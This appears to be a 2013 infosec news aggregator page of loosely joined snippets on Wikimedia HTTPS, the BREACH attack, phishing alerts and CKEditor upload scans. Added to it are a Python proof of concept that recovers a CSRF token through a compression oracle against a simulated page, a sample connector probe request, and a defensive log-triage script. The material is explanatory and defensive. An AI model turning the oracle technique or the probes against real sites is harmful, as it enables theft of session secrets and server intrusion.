Information Security News
FileTrek Survey Reveals That Black Hat Attendees' Opinions Split On
The Black Hat USA conference is attended by sophisticated hackers, security experts and leaders from all areas of the infosec community, including the corporate, government, academic and research sectors. The conference was held in Las Vegas, Nevada at ...
by Sean Gallagher
In the wake of revelations about the National Security Agency's ability to broadly capture, index, and search the contents of unencrypted Web traffic, the Wikimedia Foundation is speeding up efforts to use secure Hypertext Transfer Protocol (HTTPS) by default for site visitors and editors for Wikipedia and other Wikimedia projects. But users will need to have accounts on the foundation's sites to get that protection.
"Recent leaks of the NSA’s XKeyscore program have prompted our community members to push for the use of HTTPS by default for the Wikimedia projects," Wikimedia Foundation operations director Ryan Lane said in a blog post on August 1. "Thankfully, this is already a project that was being considered for this year’s official roadmap, and it has been on our unofficial roadmap since native HTTPS was enabled."
The XKeyscore program allows the NSA to perform searches against recent Internet traffic to find a variety of data, including the raw HTTP requests made by users. These data could encompass searches on sites, content posted to those sites, and other interactions with Web pages not secured by encryption. While sites such as Google and Facebook offer connections over HTTPS as an option (Google uses it by default when users are logged in, and Facebook turned on default HTTPS just one day ago), most sites on the Internet don't use HTTPS for a variety of technical reasons—including hosting configurations, increased server-side processing requirements, and the use of third-party services that fail under HTTPS. That means that traffic to most websites can be captured by XKeyscore's packet capture system.
Less than 24 hours after researchers disclosed a new attack that can pluck secrets from webpages protected by the widely used HTTPS encryption scheme, the US Department of Homeland Security is advising website operators to investigate whether they're susceptible.
As Ars reported Thursday, an exploit dubbed BREACH—short for Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext—can decode e-mail addresses, certain types of security tokens, and other secrets from encrypted webpages, often in as little as 30 seconds. The attack builds on a previously developed technique known as CRIME, which exploited compression to glean clues about the plain-text contents of encrypted payloads. CRIME was mitigated by disabling TLS-level compression and by changing how the Google-developed SPDY protocol compressed headers. BREACH instead measures the size of HTTP responses that the server itself compresses (gzip/DEFLATE) before encryption, so those fixes do not help. As both CERT and the developers of BREACH have said, the new attack is much harder to protect against.
"We are currently unaware of a practical solution to this problem," the CERT advisory stated. "However, the reporters offer several tactics for mitigating this vulnerability. Some of these mitigations may protect entire applications, while others may only protect individual webpages."
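The mechanism behind BREACH is a compression oracle: when attacker-controlled input is reflected into the same compressed response as a secret, the response shrinks by a little whenever the reflected guess shares a longer prefix with the secret. The script below is an added illustration of that oracle and is not code from the Ars article, CERT, or the BREACH authors. It assumes a hypothetical search page that reflects the query and carries a CSRF token in a hidden field; the token value, the hex alphabet and the page layout are all constructed for the demo. It forces DEFLATE's static Huffman codes (`Z_FIXED`) so that each extra literal costs exactly one byte and the signal is unambiguous; with the default dynamic codes the same leak exists but is not always a whole byte, which is why the real attack needs extra requests and padding tricks to break ties.

```python
import zlib

# Everything below is a constructed demo, not the BREACH authors' tooling.
SECRET_TOKEN = "a7f3b9c2e1d4"        # hypothetical per-session CSRF token
HEX = "0123456789abcdef"              # assumed token alphabet
PREFIX = 'csrf_token" value="'       # bytes that precede the token in the page


def render_page(query: str) -> bytes:
    """Server side: the response reflects attacker-controlled input (a search
    string) and also carries the secret in a hidden form field."""
    return (
        "<html><body>"
        f"<p>Search results for: {query}</p>"
        '<form action="/transfer" method="post">'
        f'<input type="hidden" name="csrf_token" value="{SECRET_TOKEN}">'
        "</form></body></html>"
    ).encode()


def compressed_size(query: str) -> int:
    """Attacker side: the only thing observed is the compressed response length.

    Z_FIXED selects DEFLATE's static Huffman codes, so each ASCII literal costs
    exactly 8 bits and a back-reference that is one character longer saves
    exactly one byte.  With the default dynamic codes the saving is the same in
    spirit but not always a whole byte, so the real attack has to break ties
    with additional requests (the BREACH authors' padding / "two tries" tricks).
    """
    z = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS, 8, zlib.Z_FIXED)
    return len(z.compress(render_page(query)) + z.flush())


def recover_token(length: int, alphabet: str = HEX) -> str:
    """Recover the token one character at a time.

    The reflected guess PREFIX+known+c appears in the page before the real
    token, so DEFLATE encodes the token as a back-reference to the guess.  Only
    the correct c extends that reference by one byte, so only that response is
    one byte shorter than the others."""
    known = ""
    for _ in range(length):
        sizes = {c: compressed_size(PREFIX + known + c) for c in alphabet}
        smallest = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == smallest]
        if len(winners) != 1:
            # Would happen with dynamic Huffman codes; BREACH resolves it with
            # padding so the two sides of the guess fall on a byte boundary.
            raise RuntimeError(f"no unique winner after {known!r}: {winners}")
        known += winners[0]
    return known


if __name__ == "__main__":
    print("recovered:", recover_token(len(SECRET_TOKEN)))
```

Each loop iteration costs 16 requests, so a 12-character hex token falls in under 200 responses, and only the ciphertext length is needed: TLS hides the content but not the size. The defensive lesson matches CERT's framing: the oracle disappears if the secret is masked with a fresh random value on every response (so the bytes never repeat), if reflected input is never compressed together with secrets, or if compression is turned off for such responses.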
Right now we are seeing fake American Express account alerts. The alerts look very real, and will trick the user into clicking on a link that may lead to malware. As with many of these attacks, the exact destination will depend heavily on the browser used.
Antivirus does recognize the intermediate scripts as malicious and should warn the user if configured to inspect web content.
Johannes B. Ullrich, Ph.D.
We are seeing *a lot* of scans for the CKEditor file upload script. CKEditor (formerly "FCKeditor", which is the layout the scanned paths below belong to) is a commonly used GUI editor allowing users to edit HTML as part of a web application. Many web applications like wikis and bulletin boards use it. It provides the ability to upload files to web servers. The scans I have observed so far appear to focus on the file upload function, but many scans will just scan for the presence of the editor / file upload function and it is hard to tell what the attacker would do if the editor is found.
Here are some sample reports:
Full sample request (a GET against the PHP connector, listing the upload folder):
GET /FCK/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F HTTP/1.1
ACCEPT: text/html, */*
USER-AGENT: Mozilla/3.0 (compatible; Indy Library)
Some sample Apache logs:
HEAD /FCKeditor/editor/filemanager/upload/test.html
HEAD /admin/FCKeditor/editor/filemanager/browser/default/connectors/test.html
HEAD /admin/FCKeditor/editor/filemanager/connectors/test.html
HEAD /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
HEAD /admin/FCKeditor/editor/filemanager/upload/test.html
HEAD /FCKeditor/editor/filemanager/browser/default/connectors/test.html
HEAD /FCKeditor/editor/filemanager/connectors/test.html
HEAD /FCKeditor/editor/filemanager/connectors/uploadtest.html
HEAD /FCKeditor/editor/filemanager/upload/test.html
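A quick way to triage this traffic in your own Apache logs is to separate presence probes (HEAD/GET against the test pages) from connector commands and from actual upload attempts, and to flag any probe the server answered with a 2xx, since that means the editor is reachable. The script below is an added example, not the diary author's tooling; the log lines it runs over are constructed in combined log format from the paths reported above, with documentation-range IPs, and the `/upload.php` line with `Command=FileUpload` is a hypothetical upload attempt added to exercise the high-severity branch.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request paths used by the FCKeditor file manager (the layout seen in the
# scans above).  The connector scripts take a Command= parameter; FileUpload
# is the one that writes a file to the server.
FCK_PATH = re.compile(r"/editor/filemanager/(?:connectors|upload|browser)/", re.I)

# Apache combined log format; the group names are ours.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def classify(line: str):
    """Return a finding dict for an FCKeditor-related request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = m["target"]
    if not FCK_PATH.search(target):
        return None
    url = urlsplit(target)
    command = parse_qs(url.query).get("Command", [""])[0]
    method = m["method"]
    if command == "FileUpload" or (method == "POST" and "upload" in url.path.lower()):
        severity, reason = "high", "file upload attempt"
    elif command:
        severity, reason = "medium", f"connector command {command}"
    else:
        severity, reason = "low", "probe for editor presence"
    return {
        "ip": m["ip"],
        "method": method,
        "path": url.path,
        "command": command,
        "status": int(m["status"]),
        # a 2xx answer to a probe means the editor (or its uploader) is reachable
        "exposed": m["status"].startswith("2"),
        "severity": severity,
        "reason": reason,
        "ua": m["ua"],
    }


def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [f for f in map(classify, lines) if f]


# Constructed sample lines modelled on the paths in the diary; the IPs are
# documentation ranges and the third line is a hypothetical upload attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Aug/2013:10:15:01 +0000] "HEAD /FCKeditor/editor/filemanager/upload/test.html HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)"
203.0.113.7 - - [02/Aug/2013:10:15:02 +0000] "GET /FCK/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F HTTP/1.1" 200 512 "-" "Mozilla/3.0 (compatible; Indy Library)"
203.0.113.7 - - [02/Aug/2013:10:15:03 +0000] "POST /FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File&Command=FileUpload HTTP/1.1" 200 89 "-" "Mozilla/3.0 (compatible; Indy Library)"
198.51.100.4 - - [02/Aug/2013:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        flag = "EXPOSED" if hit["exposed"] else "blocked"
        print(f'{hit["severity"]:6} {flag:7} {hit["ip"]} {hit["method"]} {hit["path"]} ({hit["reason"]})')
```

Anything the script marks `exposed` with severity `medium` or `high` deserves a look at the upload directory for freshly written `.php`/`.asp` files; a 404 to every probe from a given source is just background noise, but the `Indy Library` user agent is a useful pivot to find the rest of that scanner's requests.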
Posted by InfoSec News on Aug 02: http://www.dailymail.co.uk/sciencetech/article-2383200/One-PINs-correctly-guessed-time-Research-reveals-20-commonly-used-numbers.html
Posted by InfoSec News on Aug 02: http://healthitsecurity.com/2013/07/31/how-safe-is-minors-patient-data-from-hackers/
Posted by InfoSec News on Aug 02: http://www.zdnet.com/researchers-reveal-details-of-active-comfoo-cyberespionage-campaign-7000018907/
Posted by InfoSec News on Aug 02: http://www.theregister.co.uk/2013/08/02/pwnie_awards/
Posted by InfoSec News on Aug 02: http://www.thesmokinggun.com/documents/colin-powell-guccifer-email-hack-594321
Snowden picks up 'Epic 0wnage' gong in Vegas... well, not literally
The honour was announced yesterday at the Pwnie awards, Infosec's equivalent to the Oscars. Jack, 35, died last Thursday just days before he was due to give a talk on electronic medical implants for humans at Black Hat. The slot at the Las Vegas ...